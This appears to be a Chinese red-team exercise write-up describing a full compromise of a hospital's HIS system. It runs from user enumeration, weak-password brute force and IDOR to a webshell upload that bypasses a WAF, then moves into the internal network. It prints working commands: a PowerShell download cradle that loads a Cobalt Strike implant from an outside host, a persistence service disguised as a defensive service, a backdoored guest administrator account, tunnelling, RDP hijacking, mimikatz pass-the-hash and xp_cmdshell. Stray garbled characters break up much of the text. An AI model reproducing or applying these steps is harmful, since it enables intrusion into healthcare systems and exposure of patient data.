前言
記錄之前參加演練的一次實戰(zhàn)過程潦俺。
演練目標
拿下某醫(yī)院核心his權(quán)限
web打點
拿到目標沈自,通過信息收集盡可能多的尋找目標資產(chǎn)元媚,最終發(fā)現(xiàn)了存在漏洞的某系統(tǒng)断盛,通過該系統(tǒng)進入內(nèi)網(wǎng)疼蛾。
用戶枚舉漏洞
登錄處存在用戶枚舉漏洞
返回包可以看到該帳號的功能肛跌,所屬的科室等信息。
弱口令漏洞
通過對枚舉得到的用戶進行弱口令爆破,成功登陸了某醫(yī)生的賬戶惋砂。
該賬戶只有一個體檢預約管理的功能妒挎,經(jīng)過測試無法直接getshell。
越權(quán)漏洞
觀察當前url地址西饵,發(fā)現(xiàn)存在usersysid和deptid兩個參數(shù)酝掩,usersysid為當前用戶名,deptid恰好可以通過用戶枚舉得到眷柔,因此可能存在越權(quán)漏洞期虾。
經(jīng)過測試發(fā)現(xiàn)可以通過修改參數(shù)進行越權(quán),大部分為普通用戶驯嘱,經(jīng)過反復嘗試發(fā)現(xiàn)269用戶權(quán)限比較高镶苞,嘗試替換usersysid和deptid進行越權(quán)。
成功訪問到該帳號的功能模塊鞠评。
文件上傳漏洞
對高權(quán)限用戶的功能模塊進行測試茂蚓,發(fā)現(xiàn)上傳點。
網(wǎng)站存在某種waf剃幌,常規(guī)webshell無法直接上傳聋涨,嘗試進行bypass。
最終繞過waf成功上傳webshell负乡,對數(shù)據(jù)包進行了4次處理牍白。
1、"boundary="后面加tab鍵
2抖棘、使用asHX后綴
3茂腥、刪除"Content-type:"后面的類型信息
4、正常圖片文件的內(nèi)容開頭
成功得到目標webshell切省,web打點結(jié)束最岗。
內(nèi)網(wǎng)橫向
上線cs
目前只有一個webshell命令執(zhí)行權(quán)限,為了后續(xù)橫向数尿,嘗試利用cs進行多人運動~
首先查看目標主機是否出網(wǎng)仑性,和安裝的殺軟情況惶楼。
通過ping命令確定目標出網(wǎng)右蹦。
通過tasklist命令查看是否運行殺軟
https://maikefee.com/av_list
未發(fā)現(xiàn)存在殺軟
系統(tǒng)版本為server2012,嘗試直接運行powershell命令上線cs歼捐。
powershell.exe IEX ((new-object net.webclient).downloadstring('http:x.x.x.x:xx/x'))
cs成功上線何陆,當前為iis權(quán)限,直接使用梼杌的提權(quán)插件豹储。選擇使用爛土豆提權(quán)server2012
https://github.com/pandasec888/taowu-cobalt-strike
成功提升至system權(quán)限贷盲。
權(quán)限維持
目前已經(jīng)得到了system權(quán)限,為了防止webshell被刪,服務器重啟巩剖,web服務關(guān)閉等問題铝穷,需要做一下權(quán)限維持。
http://www.reibang.com/p/f3f3d4d34701
我常用的把powershell上線cs的命令注冊成服務佳魔,每次開機執(zhí)行曙聂。(容易被發(fā)現(xiàn),追求隱蔽性不推薦該方法)
創(chuàng)建一個名為主動防御的服務鞠鲜。
sc create "主動防御" binpath= "cmd /c start powershell.exe IEX (new-object net.webclient).downloadstring('http://x.x.x.x/a')"
設置為自動運行
sc config "主動防御" start= auto
演練結(jié)束刪除服務宁脊。
sc delete "主動防御"
激活guest用戶
net user guest /active:yes
net user guest Qax@123
net localgroup administrators guest /add
搭建隧道
可以選擇 nps和frp
我使用是nps代理
優(yōu)點: 穩(wěn)定,速度快贤姆,管理方便
缺點:掃描內(nèi)網(wǎng)主機端口全部開放(不知道是不是我nps版本的問題)
創(chuàng)建客戶端
上傳服務端到目標服務器執(zhí)行
npc.exe -server=x.x.x.x:xxx -vkey=xxxxxx -type=tcp
使用Proxifier代入內(nèi)網(wǎng)榆苞。
RDP登陸
有時候我們需要登陸管理員用戶方便進行信息收集。
目標為server2012 mimikatz默認無法讀取明文密碼霞捡,因此在ntml hash解不開的情況下坐漏,我們可以嘗試2種方法進行登陸。
1碧信、RDP劫持
登陸激活的guest用戶仙畦,執(zhí)行命令,劫持administrator
query user
sc create tide binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#4" #1為目標會話id和當前會話名
net start tide
2音婶、pth登錄遠程rdp
對于server 2012系統(tǒng)慨畸,直接使用mimikatz傳遞ntlm hash值登錄
privilege::debug
sekurlsa::pth /user:administrator /domain:127.0.0.1 /ntlm:32ed87bdb5fdc5e9cba88547376818d4 "/run:mstsc.exe /restrictedadmin"
win10系統(tǒng)報錯
需要修改注冊表
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f
重新登錄
privilege::debug
sekurlsa::pth /user:administrator /domain:127.0.0.1 /ntlm:32ed87bdb5fdc5e9cba88547376818d4 "/run:mstsc.exe /restrictedadmin"
!R率健寸士!登陸前使用命令查看管理員是否在線。
query user
這里選擇使用RDP劫持的方式登陸了administrator用戶碴卧。
內(nèi)網(wǎng)信息收集
具體信息收集的過程不再描述弱卡,通過內(nèi)網(wǎng)信息收集,發(fā)現(xiàn)了數(shù)據(jù)庫連接配置文件住册,包含his婶博,lis等核心數(shù)據(jù)庫。
解密his數(shù)據(jù)庫連接信息荧飞,發(fā)現(xiàn)目標為sql server數(shù)據(jù)庫凡人。
數(shù)據(jù)庫服務器和當前跳板機為2個不同b段。
獲取核心his權(quán)限
利用得到的賬戶密碼直接登陸his數(shù)據(jù)庫叹阔。
嘗試使用xp_cmdshell執(zhí)行系統(tǒng)命令挠轴。
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
exec master..xp_cmdshell "whoami"
成功拿到his數(shù)據(jù)庫服務器權(quán)限。
目標不出網(wǎng)耳幢,且無法ping通跳板機岸晦。
證實了該服務器為his服務器,且該網(wǎng)段為核心內(nèi)網(wǎng)。至此達到演練目標启上。
擴展
目前只能通過數(shù)據(jù)庫來執(zhí)行系統(tǒng)命令邢隧,嘗試上線到cs上。
該his服務器不通外網(wǎng)冈在,且不通跳板機所在的網(wǎng)段绢记。
反向連接失效角骤,嘗試使用正向連接惑艇,上線目標服務器到cs蜒什。
cs新建一個監(jiān)聽器,選擇beacon-tcp兴使,執(zhí)行后本地開放一個端口
生成一個無狀態(tài)的可執(zhí)行木馬文件系宜,選擇對應的監(jiān)聽器。
上傳木馬文件到目標主機~
這里遇到了困難发魄,目標不出網(wǎng)盹牧,且不通當前跳板機,只有cmd命令行的情況下励幼,無法直接上傳汰寓。
解決方法:目標開放了iis服務,向iis服務網(wǎng)站目錄下 echo一個apsx一句話木馬苹粟,然后通過webshell上傳可執(zhí)行exe文件有滑。
利用SQL TOOLS可以直觀的尋找目標網(wǎng)站目標,然后echo寫入木馬嵌削。
使用webshell上傳exe并且執(zhí)行毛好。
執(zhí)行后會本地開放一個8877端口。
在跳板機的cs會話中執(zhí)行:
connect x.x.x.x 8877
去正向連接目標開放的8877端口苛秕。
成功通過多層內(nèi)網(wǎng)上線了目標主機肌访。
總結(jié)
不算復雜的一次內(nèi)網(wǎng)實戰(zhàn)過程,知識又增加了艇劫。
